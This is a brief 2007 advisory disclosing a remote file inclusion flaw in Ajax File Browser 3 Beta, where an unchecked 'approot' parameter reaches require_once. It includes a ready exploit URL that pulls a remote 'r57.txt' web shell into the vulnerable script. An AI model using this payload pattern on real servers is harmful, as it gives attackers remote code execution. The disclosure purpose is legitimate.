Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability

2007-09-14 00:00:00

Ajax File Browser 3 Beta Remote File Inclusion
##############################################

found by the "arfis project"
http://arfis.wordpress.com/

Project Info:
-------------
Name: Ajax File Browser
Link: http://sourceforge.net/projects/ajaxfb/
DL: http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip


Vulnerability Info:
-------------------
File: _includes/settings.inc.php
Line: 12
Code: require_once($approot. _includes/functions_file.inc.php );


Exploit Example:
----------------
http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?


About arfis:
------------
"arfis" stands for "automated Remote File Inclusion search". It's a perl script
that automatically download and extract PHP projects from sourceforge.net. It then
checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
blog, or database if you want to call it like that. Feel free to come around and
find your own RFI:
http://arfis.wordpress.com/

#

Fixes

No fixes

In order to submit a new fix you need to be registered.